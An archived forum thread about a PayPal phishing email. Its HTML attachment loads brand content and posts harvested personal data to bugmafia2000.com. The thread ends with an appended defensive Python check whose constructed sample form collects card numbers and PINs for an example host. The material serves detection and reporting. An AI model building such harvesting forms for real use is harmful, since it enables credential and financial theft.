
Phish tactics



I've totally fallen off the wave when it comes to spam (not getting very much of it with which to keep in touch) but a recent PayPal phish caught my eye as looking comparatively convincing in terms of containing reasonably business-like (brief) text and an attachment full of proper (pilfered) linked content with a sneaky, but of course 'invisible' form processing address - therefore being sure to catch a few unwary souls who forget PP's solemn undertaking to never, ever send mail like that. So, forgive me if it is 'old hat'. The example is:


The attachment is an HTML file which pulls down content from PayPal and Bank of America, programmatically (JavaScript) demands just about every piece of personal information imaginable then choofs it off to bugmafia2000.com for 'processing' (which is the invisible part) using a <form action ... method="post"> tag. No doubt the whole thing looks pretty spiffy if opened. Thinking of the consternation caused by 'image' spam some time ago, one has to reflect this is infinitely worse (with a higher hit rate - almost definitely - and easier to modify and maintain).

SC of course doesn't touch the "application/octet-stream part" attachment and doesn't get near the criminals' processing site. The From: and Reply-to: addresses are no part of this one (simply spoofed) - everything is handled by the HTML-scripted form. Checking bugmafia2000.com against SC shows that reports aren't/wouldn't be currently sent to either of the reporting addresses identified anyway (unresponsive and/or spammy?).

Nasty, nasty.


...You've alerted those honorable institutions, I hope!
Reported at the time (yesterday) to spoof[at] for PayPal as lead party - BOA[1] seem to be just incidental, hard to know without looking more deeply and that can be a little dangerous without more knowledge than I have.

Time was when you could just change the extension to .doc and look at the HTML code with impunity. I discovered those days are past (MS Word merrily tries to contact every href and src - apparently); need to make it .txt or .rtf and be sure Word hasn't inveigled itself into the default for even those. Life's too short. Spent enough time with 'infernal machines' of the *boom* type, when I hadn't the option, to be disinclined now, when I have the choice, to volunteer staking my meagre wits in second-guessing the designers of the metaphorical equivalents of such. Well, yeah, one enjoys the challenge but ... you know your ego's going to exceed your skill at some point.

I did trigger a scan of bugmafia2000.com to be queued at McAfee SiteAdvisor and left a phish alert comment there. Even that took longer than it should have - seems I have progressively tightened up security on several of my browsers to the point where they don't want to do anything except browse now :lol: .

[Edit] [1] Corrected from BOM (Bank of 'Merika? :blush:) but I suppose 'like unto a serpent of the spotted kind' is more proper.


  • 3 weeks later...

Checking the attachment with VirusTotal of another received today, Kaspersky thinks it contains/constitutes Trojan-PSW.HTML.PayPal.a - this being the only identification from the 41 AV engines and only added to Kaspersky's definitions today. This is a chunk of HTML with embedded scripts and stuff and is trivially altered - that means the hash values can be variable and any virus/spyware detection based on hash "signatures" is always going to be well behind the game. This attachment is a different size from the previous one mentioned. A re-scan of that older one now comes up with a Kaspersky (only) hit for Trojan-PSW.HTML.PayPal.a also. I have no idea what sort of detection Kaspersky uses but suspect it is not tied to hash signatures.

Latest example received a day after using on-line banking. I have a feeling the previous one was too. What me worry? A sufficiently large environment is full of coincidences (whistles, eyeballs at 45 degrees to the horizontal - also to the vertical - and 90 degrees from the axial).

Take care out there. Yes, PayPal are on the job, spoof[at] having been notified (forward sample as an attachment).



This topic is now archived and is closed to further replies.
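Added example, not part of the original thread: a defender-side check for the pattern the posts describe, an HTML attachment that displays content loaded from one site while its form POSTs to an unrelated one, together with a demonstration that a trivially altered copy gets a different hash but the same structural verdict. The sample HTML, the host names (reserved example domains) and the two-label "site" heuristic are assumptions made for this sketch.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

def site(url):
    """Crude site guess: last two host labels (assumption; no public-suffix list)."""
    host = (urlparse(url).hostname or "").lower()
    return ".".join(host.split(".")[-2:]) if host else ""

class FormAudit(HTMLParser):
    """Collects where a page loads content from and where its forms send data."""
    def __init__(self):
        super().__init__()
        self.content_sites, self.post_targets = set(), set()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            if a.get("method", "get").lower() == "post" and site(a.get("action", "")):
                self.post_targets.add(site(a["action"]))
        else:
            for key in ("src", "href"):
                if site(a.get(key, "")):
                    self.content_sites.add(site(a[key]))

def audit(html):
    """Return form POST destinations that serve none of the page's displayed content."""
    p = FormAudit()
    p.feed(html)
    p.close()
    return sorted(p.post_targets - p.content_sites)

# Constructed sample; hosts are reserved example names, not values from the thread.
SAMPLE = """<html><body>
<img src="https://www.brand.example/logo.gif">
<link rel="stylesheet" href="https://www.brand.example/style.css">
<form action="http://collector.test/process.php" method="post">
<input name="card_number"><input name="pin" type="password">
</form></body></html>"""
# A trivially altered copy: one extra comment, identical behaviour.
VARIANT = SAMPLE.replace("<body>", "<body><!-- x -->")

def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()

if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE), ("variant", VARIANT)):
        print(name, sha256(doc)[:16], "off-brand POST targets:", audit(doc))
```

The parser only reads the markup as text, so nothing in the attachment is fetched or rendered while it is inspected.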
